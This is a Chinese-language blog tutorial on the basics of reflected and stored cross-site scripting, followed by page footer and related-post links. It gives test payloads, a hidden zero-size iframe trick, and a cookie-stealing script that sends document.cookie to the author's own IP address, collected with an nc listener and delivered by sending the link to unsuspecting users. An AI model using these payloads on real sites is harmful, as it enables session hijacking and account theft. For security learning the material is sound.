XSS基础(一)

于 2023-03-21 01:04:15 发布
阅读量117 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55017965/article/details/129678790
版权

  1. 反射型xss:修改前端的代码,使得恶意代码被前端解析,所以只在一台用户的计算机上或者实现xss漏洞的网址上展现出漏洞。

  1. 存储型XSS:修改前端代码使得被后端服务器解析,使得恶意代码直接命令到数据库,所以所有访问到有xss漏洞的网站都会受到危害。

在留言板上执行xss语句:

简单验证有没有Xss存储,也可以填写alert("Xss ScriPt"),绕过大小写

(如重新打开原始页面有漏洞出现,那为存储型漏洞)可作为判断漏洞类型的方法,以便以后的利用。

利用方法:

1、增加一留言,并在留言内容中改为 <iframe src="https://www.baidu.com"></iframe>

  1. 隐藏恶意网页。增加留言,内容包含以下语句:<iframe src=http://www.baidu.com width="0" height="0"></iframe>,观察返回状态,网页被执行,但未在留言系统界面中显示。这样如果是攻击脚本就可以用此方法隐藏自己。

获取用户cookies方法:

1.对于反射形xss:

<script>alert(document.cookie)</script>,但是没什么实质的危害,因为该漏洞为反射型,只有访问这个页面的人才能看到在线cookie敏感信息。(可作为判断是否为反射型漏洞)

2.

先构造一个网站:<script>new Image().src="" target="_blank">http://10.1.8.142:8888/?output="+document.cookie;</script>

10.1.8.142:8888是自己电脑的端口及其IP

这个cookies是访问该网站的用户的,所以攻击思路是构造出这个xss网站,再发这个网站给不知情的用户,然后在自己的电脑上下载一个监听器,来获取用户泄露的cookies:

打开Kali,启动NC监听器

最后,如果有用户访问这个你构造的网站,他的cookies就会被你的Kali截取。

对于存储型cookies获取:

先修改输入长度,因为注入的payload可能会比较长

输入:<script>new Image().src="" target="_blank">http://10.1.8.1:9999/?output="+document.cookie;</script>

然后在操作机中开启监听,

nc  -lvp  9999

原理:相当于把一行恶意代码注入到了后端服务器里,该代码要求把用户的cookie发送到自己的电脑上。

Zero cool Ⅱ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
APP端常见漏洞与实例分析
IT教育任姐姐的博客
03-03 2498
前言:白帽子们一般都是从web端开始学习安全技术,但是我们并不满足于web端,自然而然地对APP端产生了浓厚的兴趣,本文将讲述如何在移动端进行渗透,并分享自己在对移动端渗透过程中常见的漏洞与一些案例的分析。 01环境搭建 首先下载一个模拟器来模拟手机的环境,本文使用的是夜神模拟器。 1、在burpsuite中新建一个代理,注意端口不要冲突 2、在模拟器中打开设置界面中的WLAN菜单,长按弹出,点击修改网络 3、点击手动,然后配置电脑的ip,和代理端口,保存退出。 4、打开浏览器,访.
前端安全之XSS及CSRF
Spontaneous_0的博客
02-15 277
前端安全之XSS及CSRF
App渗透测试原理
孤桜懶契
05-16 1090
App渗透测试和Web渗透测试基本没有区别 App其实就是手机软件,你们不需要害怕他,问一个简单的问题,用匿名的手机去访问我们的猫舍,难道他的SQL注入就不存在了吗? 大部分漏洞的存在并不是在客户端而是在服务器 例如:SQL注入、验证码绕过、XSS、越权漏洞、支付漏洞、CSRF、变量覆盖、反序列化、文件包含、SSRF、XXE、文件上传等等 其实我们可以再换一个思路,渗透测试网站,其实核心是控制传参访问对吗?如果说我们不对他进行访问和传参,那么他有可能被你渗透攻击下来吗? 那么渗透测试的核心其实就是把控传参,
appXSS盲打
01-28 593
最近项目代码被安全测试组的同学提了一个安全的漏洞风险,在用户提交的页面文本输入提交数据处理的接口中没有做HTML Encode处理,导致用户输入的数据变成了代码。存在很严重的安全隐患,风险的大小取决于用户提交的数据变成可被执行的js代码逻辑。 如何防范: 对数据进行...
6.bWAPP XSS
自强不息
01-26 705
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
XSS.zip_XSS_c xss
09-24
**XSS(跨站脚本攻击)基础知识** XSS,全称为Cross-Site Scripting,是一种常见的网络安全漏洞,主要发生在Web应用中。攻击者通过注入恶意脚本到网页上,当用户浏览这些网页时,恶意脚本会在用户的浏览器中执行,...
007-Web安全基础3 - XSS漏洞.pptx
10-11
XSS(cross site script)或者说跨站脚本是一种Web应用程序的漏洞,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。
xssshell工具一份
09-28
**XSS基础知识** 1. **跨站脚本(XSS)分类**:XSS攻击通常分为三类:反射型XSS、存储型XSS和DOM型XSS。反射型XSS是通过URL中的恶意参数触发,存储型XSS则是将恶意脚本存储在服务器上,DOM型XSS则涉及到了浏览器的...
安装xss-labs ppt手册
10-22
1. **学习XSS基础知识**:在开始实际操作前,了解XSS的分类(反射型、存储型和DOM型)以及常见的攻击手段是非常重要的。理解XSS攻击的原理和危害,能够帮助你更好地应对挑战。 2. **准备Payload库**:XSS攻击往往...
Xenotix XSS Exploit Framework
03-01
Xenotix XSS Exploit Framework是一款专门针对跨站脚本(XSS)漏洞进行测试和利用的强大工具。在网络安全领域,XSS攻击是一种常见的攻击手段,通过注入恶意脚本到网页中,攻击者可以窃取用户敏感信息,如登录凭据,...
bWAPP解法记录——XSS
bringer的博客
12-19 3055
bWAPP解法记录——XSS bWAPP简介 ​ bwapp是一个漏洞演示平台,包含100多个漏洞。可以单独下载安装,也可以下载虚拟机版本。此处给出下载地址: https://sourceforge.net/projects/bwapp/ xss漏洞练习 跨站脚本攻击的终极思路:让输入的内容在页面中回显。 1-XSS - Reflected(GET) 1)low等级 未对输入进行过滤 在...
Android应用安全之android平台上的xss攻击
mxy2002924的专栏
09-22 1956
http://www.2cto.com/Article/201202/119099.html android 4.0 后已经不可以加载loadUrl("file///sdcard/x.")了
bWAPP XSS
angry_program的博客
03-08 901
0x01、XSS - Reflected (GET) Low 输入的内容直接输出到页面中: 后台服务端没有对输入的参数进行过滤, 直接任选一个注入xss payload即可: <script>alert(1)</script> Medium 虽然服务端进行了过滤, 但只是addslashes()函数而已(防sql注入), 依旧可以xss: ...
XssAPP开源,Xss跨站脚本攻击测试平台(JAVA开发) BY:WebSOS
mywebsos的博客
06-19 7707
XssAPP 一套针对Xss跨站脚本攻击的专业测试平台 开源日期:2016-05-29 开发者:WebSOS 开发时间:2015年下半年 开发语言:JAVA 使用技术:Spring Hibernate 反射技术 说明:本程序源码一切权益归WebSOS所有,他人不得随意修改与转卖,本程序仅做技术交流,切勿用于非法途径 链接: http://pan.baidu.com/s/1kUWVkXp 密码: 885i
XSS————XSS绕过Bypass的各种各样姿势
热门推荐
Fly_鹏程万里
04-16 1万+
XSS 攻击是一种攻击者将 JavaScript 代码注入到用户运行页面中的攻击。为了避免这种攻击,一些应用会尝试从用户输入中移除 JavaScript 代码,但这很难完全实现。在本文中会先展示一些尝试过滤 JavaScript 的代码,并随后给出其绕过方法。以一个网上商城应用Magento中的过滤类 Mage_Core_Model_Input_Filter_MaliciousCode为例,部分代...
bwapp XSS
h0ld1rs的博客
08-14 768
文章目录XSS - Reflected (GET)XSS - Reflected (POST)XSS - Reflected (JSON)XSS - Reflected (AJAX/JSON)XSS - Reflected (Back Button)XSS - Reflected (Custom Header)XSS - Reflected (Eval)XSS - Reflected (HREF)XSS - Reflected (Login Form)XSS - Reflected (PHP_SELF)XS
XSS -- 三种基本漏洞 (浅谈)
thj_blog
11-13 7180
一、  XSS 漏洞的验证         我们可以用一段简单的代码,验证和检测漏洞的存在,这样的代码叫做PoC(Proof of Concept)。验证XSS 漏洞存在的PoC 如下:               (1)&lt;script&gt;alert(/xss/)&lt;/script&gt;                      (2)&lt;script&gt;confirm('...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8342
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
磁力链磁力链磁力链.txt
最新发布
07-22
磁力链
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值